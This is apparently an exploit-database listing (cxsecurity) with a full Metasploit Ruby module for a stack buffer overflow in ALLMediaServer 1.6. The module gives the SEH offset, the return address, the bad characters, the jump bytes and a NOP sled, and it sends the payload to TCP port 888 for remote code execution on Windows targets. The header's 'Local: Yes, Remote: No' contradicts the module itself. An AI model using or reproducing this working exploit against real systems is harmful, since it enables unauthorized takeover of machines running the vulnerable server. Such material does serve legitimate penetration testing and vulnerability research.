ALLMediaServer 1.6 Buffer Overflow

2022.04.04
Credit: Hejap Zairy
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## # Author: Hejap Zairy # Date: 1.08.2022 # Exploit Prof # Proof and Exploit: #image:https://i.imgur.com/yLrRR2t.png #video:https://streamable.com/x4i50c require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'ALLMediaServer 1.6 Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in ALLMediaServer 1.6 The vulnerability is caused due to a boundary error within the handling of HTTP request. Thank you Saud Alenazi and 0xSaudi and Muhammad Al Ahmadi and all the friends in Tuwaiq i Love Tuwaiq }, 'License' => MSF_LICENSE, 'Author' => [ 'Hejap Zairy Al-Sharif', # Remote exploit and Metasploit module ], 'DefaultOptions' => { 'ExitFunction' => 'process', #none/process/thread/seh }, 'Platform' => 'win', 'Payload' => { 'BadChars' => '\x00\x0a\x0d\xff' }, 'Targets' => [ [ 'ALLMediaServer 1.6 / Windows 10 - English', { 'Ret' => 0x0040590B, # POP ESI # POP EBX # RET 'Offset' => 1072 } ], [ 'ALLMediaServer 1.6 / Windows XP SP3 - English', { 'Ret' => 0x0040590B, # POP ESI # POP EBX # RET 'Offset' => 1072 } ], [ 'ALLMediaServer 1.6 / Windows 7 SP1 - English', { 'Ret' => 0x0040590B, # POP ESI # POP EBX # RET 'Offset' => 1072 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Apr 1 2022', 'DefaultTarget' => 1)) register_options([Opt::RPORT(888)], self.class) end def exploit connect buffer = "" buffer << make_nops(target['Offset']) buffer << "\xeb\x06\x90\x90" buffer << "\x0B\x59\x40\x00" buffer << make_nops(100) buffer << payload.encoded buffer << make_nops(50) print_status("Sending payload ... \n Exploit MediaServer") sock.put(buffer) handler disconnect end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top